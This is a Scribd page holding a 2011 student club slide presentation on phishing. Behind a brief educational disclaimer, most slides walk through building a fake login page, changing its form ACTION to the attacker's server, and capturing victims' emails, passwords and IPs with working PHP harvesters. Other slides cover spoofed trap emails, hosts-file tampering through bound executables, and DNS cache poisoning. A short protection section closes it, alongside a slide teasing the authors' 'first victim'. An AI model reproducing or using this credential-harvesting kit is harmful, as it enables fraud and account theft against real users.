Scribd
Upload
20 views40 pages

Understanding Phishing Techniques

The document is a presentation on phishing, detailing its definition, methods of execution, and statistics related to its prevalence. It outlines the necessary preparations for creating phishing attacks, including the use of misleading websites and email traps, as well as techniques like DNS cache poisoning. Additionally, it provides guidance on how individuals can protect themselves from such attacks by verifying website security and being cautious with personal information.

Uploaded by

ScribdTranslations
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
20 views40 pages

Understanding Phishing Techniques

The document is a presentation on phishing, detailing its definition, methods of execution, and statistics related to its prevalence. It outlines the necessary preparations for creating phishing attacks, including the use of misleading websites and email traps, as well as techniques like DNS cache poisoning. Additionally, it provides guidance on how individuals can protect themselves from such attacks by verifying website security and being cautious with personal information.

Uploaded by

ScribdTranslations
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

1

The Computer and Free Software Club of the School


Polytechnic of Tunisia

Phishing
Prepared by:
Mohamed Amine RHOUMA
Marwen ZORGUI

11/11/2011 2010
2
Illegal

3
LOL …

4
Disclaimer

This presentation is for educational purposes, It is


strictly illegal to apply it for purposes
dishonest.

5
PLAN

What is Phishing??
Necessary preparation
Trap the victim
How to protect oneself??

6
PLAN

What is Phishing?
Necessary preparation
Trap the victim
How to protect oneself??

7
Definition
Concatenation of dephreaking (hacking of
telephone systems) and fishing

Go fishing for information

Also known as Phishing and Scamming

Technique used by fraudsters to obtain


personal information

8
Principle of the attack

FAKE SITE:
The victim believes they are on a trustworthy site.
to enter his personal data, but in
In reality, he is sending them to the hackers.
computer science

9
Principle

Access to the misleading page

Entering confidential information

Data recording by the criminal

10
Some statistics...
In 2007, phishing brought in 3.2 billion
dollars to the pirates

Phishing victim sites: all sites


containing personal data, especially
banking (PayPal, Facebook, SNCF, CAF,...)

55,000 computer users victims


phishing scams every month in the
world

11
PLAN

What is Phishing?
Necessary preparation
Trap the victim
How to protect oneself??

12
Necessary preparation

Creation of the misleading page

Data storage

13
Creation of the misleading page
Recording of the original page with the
images and other files (CSS: Cascading
Style Sheets, JavaScript...

14
Creation of the deceptive page

Modify the source code of the deceptive page


and more precisely the ACTION attribute of the
tag<FORM>

Firebug: add-on for Firefox

15
Editing with Firebug

16
Creation of the misleading page
<form
method ="POST"
action="[Link]
<input name="email" value="Adresse électronique" type="text">
<input name="pass" type="password">
</form>

Becomes:
<form
method="POST" action=“[Link]" >
<input name="email" value="Adresse électronique" type="text">
<input name="pass" type="password">
</form>

17
Necessary preparation

One can use WAMPserver which allows for


our machine behaves like a
server

Another alternative is to host our


web page on the internet

18
Data storage

We have several methods to


retrieve the data
•Use of aDatabase
Use of [Link]
•Use of the functionmailto
Etc.

19
Database: creation

20
Database: PHP code

<?php
mysql_connect("localhost","root","");
mysql_select_db("madrid");

$a=$_POST["email"];
$b=$_POST["pass"];
$c=$_SERVER["REMOTE_ADDR"].

$reponse=mysql_query("INSERT INTO tableau VALUES('','$a','$b','$c')") or


die(mysql_error());

Header("Location: [Link]

?>

21
TXT file
<?php
$fp = fopen("[Link]", "a+");

fputs($fp,$_POST[email]);
fputs($fp," ");
fputs($fp,$_POST[pass]);
fputs($fp, " ");
fputs($fp," ");
fputs($fp,$_SERVER["REMOTE_ADDR"]);
fputs($fp, " ");

fclose($fp);

Header("Location:[Link]
?>

22
PLAN

What is Phishing?
Necessary preparation
Trap the victim
How to protect oneself??

23
24
Trap the victim

Trap mail

Fichier hosts

DNS Cache poisoning

Etc.

25
Trap mail
Simple, quick and efficient

Create an email address that imitates a third party


trust (disposable addresses, fake email...), for example
sami@[Link]
Reproduce the logo of the company being impersonated
identity.

Find a pretext for the victims to come to the


fake site, to enter their personal information.

Send the phishing email to as many people as possible.

26
Hosts file
In the folder:
C:\Windows\System32\drivers\etc

Consultation of this file before accessing the server


DNS

Allows the system to know the associated IP address


in the domain name without making a request
DNS

27
hosts file

Attack by .rardont the extraction replaces the


hosts file

Attack by .exe file where the installation goes


modify the hosts file (Binder)

28
Binder: principle

[Link] [Link]

[Link] (Trapping)

29
hosts file

Linux prevents all kinds of attacks

30
DNS Cache Poisoning
DNS servers have a cache that allows for
keep correspondence for a certain time
between a machine name and its IP address

DNS Cache Poisoning involves corrupting it


cache with false information

31
Brief

Trap mail
Hosts File
DNS Cache poisoning
•…

32
PLAN

What is Phishing?
Necessary preparation
Trap the victim
How to protect oneself??

33
How to protect oneself??

Make sure, when you enter information


sensitive, that the browser is in secure mode
(https)

34
How to protect oneself??

•Ensure that the domain of the site in the address


corresponds well to that announced (Beware of
the spelling of the domain
•Beware of websites of the type
[Link]
•Check the links in the emails even if they
come from a trusted source

35
How to protect oneself??
One must be particularly vigilant when
one encounters a web address containing the
symbol ‘@’
For example, the address
[Link]
leads to [Link] and not to
[Link] as one could
to believe

36
How to protect oneself??
Only download programs from
official sites
Use an antivirus

37
Surprise!!

Our first victim was ....

38
39
Thank you for your
attention !!
40

You might also like